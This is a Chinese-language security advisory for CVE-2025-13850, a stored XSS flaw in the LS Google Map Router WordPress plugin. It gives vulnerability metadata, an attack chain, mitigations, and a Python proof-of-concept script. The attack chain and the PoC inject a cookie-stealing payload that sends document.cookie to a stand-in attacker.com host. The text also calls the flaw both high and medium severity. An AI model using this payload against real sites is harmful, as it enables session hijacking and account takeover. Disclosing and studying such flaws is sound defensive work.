CVE-2025-13850 WordPress LS Google Map Router插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-13850

漏洞类型

存储型XSS

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

LS Google Map Router插件 for WordPress

漏洞概述

CVE-2025-13850是WordPress平台下LS Google Map Router插件的一个高危安全漏洞。该插件是一款用于在WordPress网站中集成Google地图路由功能的流行插件，广泛应用于需要展示地理位置和路线信息的网站。漏洞根源在于插件对用户输入的map_type参数缺乏充分的输入消毒和输出转义处理，导致恶意脚本代码可以被永久存储在服务器端。攻击者只需拥有WordPress网站的Contributor级别账户（低权限角色），即可利用此漏洞在受影响的页面中注入任意JavaScript代码。一旦用户访问包含恶意代码的页面，这些脚本将自动执行，可能导致会话劫持、敏感信息窃取、恶意重定向等严重后果。由于是存储型XSS漏洞，攻击代码会永久存在于数据库中，影响所有访问该页面的用户，包括管理员。由于CVSS评分为6.4（中等），且攻击复杂度低、无需特殊权限，该漏洞在实际环境中容易被利用，对网站安全性构成实质性威胁。建议网站管理员立即检查插件版本并采取相应修复措施。

技术细节

该漏洞是一个典型的存储型跨站脚本（Stored XSS）漏洞，位于LS Google Map Router插件的map_type参数处理逻辑中。具体问题出现在ls-gmap_route.php文件的第61行附近，插件直接获取用户提交的map_type参数值并将其插入到HTML输出中，未进行任何输入验证、过滤或输出编码处理。攻击者通过WordPress后台的插件设置界面提交包含恶意JavaScript代码的map_type参数值，如<script>alert(document.cookie)</script>。由于插件未对该参数进行htmlspecialchars()或类似函数的转义处理，恶意代码被原样存储在WordPress数据库的wp_options或相关配置表中。当其他用户访问包含该地图组件的页面时，服务器从数据库读取并输出这段未转义的HTML内容到页面响应中。浏览器在解析页面时会将<script>标签内的内容作为JavaScript代码执行，从而实现XSS攻击。由于存储型XSS的特性，攻击代码会在每次页面加载时自动执行，无需受害者点击任何链接或进行其他交互操作。攻击者可以利用此漏洞窃取用户会话Cookie、劫持用户账户、执行任意管理操作或传播恶意内容。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标网站使用的WordPress版本及LS Google Map Router插件版本，确认版本号<=1.1.0以确定漏洞存在

STEP 2

Account Acquisition

攻击者通过社会工程、密码爆破或其他方式获取WordPress网站的Contributor级别账户凭据

STEP 3

Payload Preparation

攻击者构造恶意JavaScript代码作为XSS payload，如窃取Cookie的脚本：<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>

STEP 4

Injection Execution

通过WordPress后台管理界面或直接发送HTTP请求，将恶意payload作为map_type参数值提交到插件设置页面

STEP 5

Persistence

恶意代码被存储在WordPress数据库中，由于是存储型XSS，代码会永久存在于服务器端

STEP 6

Exploitation Trigger

当普通用户或管理员访问包含[ls_gmap_route]短代码的页面时，服务器从数据库读取并输出未转义的恶意代码

STEP 7

Malicious Execution

受害者浏览器解析页面时执行注入的JavaScript代码，攻击者因此获得用户会话、窃取敏感信息或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-13850 PoC - Stored XSS in LS Google Map Router plugin
# Affected Version: <= 1.1.0
# Attack Vector: map_type parameter

import requests
from bs4 import BeautifulSoup

# Configuration
target_url = "http://target-wordpress-site.com"
username = "attacker_contributor"  # Contributor-level account
password = "password123"

# XSS Payload
xss_payload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'

# Step 1: Login to WordPress
session = requests.Session()
login_url = f"{target_url}/wp-login.php"
login_data = {
    "log": username,
    "pwd": password,
    "wp-submit": "Log In",
    "redirect_to": f"{target_url}/wp-admin/admin.php?page=ls-gmap-route"
}

response = session.post(login_url, data=login_data)
print("[+] Logged in successfully") if "wp-admin" in response.url else print("[-] Login failed")

# Step 2: Inject XSS payload via map_type parameter
plugin_settings_url = f"{target_url}/wp-admin/admin.php?page=ls-gmap-route"

# Malicious payload injection
inject_data = {
    "map_type": xss_payload,
    "submit": "Save Changes"
}

response = session.post(plugin_settings_url, data=inject_data)
print("[+] XSS payload injected successfully") if response.status_code == 200 else print("[-] Injection failed")

# Step 3: Verify the stored XSS
# Visit any page containing the map shortcode
page_with_map = f"{target_url}/?page_id=123"  # Page with [ls_gmap_route] shortcode
response = session.get(page_with_map)

if xss_payload in response.text:
    print("[+] Stored XSS confirmed - payload present in page output")
    print(f"[+] Payload will execute when page is loaded in victim's browser")
else:
    print("[-] XSS not found - may require shortcode activation")

影响范围

LS Google Map Router插件 <= 1.1.0（所有版本）

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 临时禁用LS Google Map Router插件或限制其功能；2) 检查并清理数据库中wp_options表内可能存在的恶意map_type值；3) 对所有WordPress用户账户启用双因素认证；4) 使用Web应用防火墙（WAF）规则拦截包含script标签的请求参数；5) 撤销所有非管理员账户的Contributor角色权限；6) 加强用户密码策略并定期轮换；7) 监控网站访问日志和服务器日志，排查异常请求模式。建议尽快升级到插件最新版本以彻底消除该安全风险。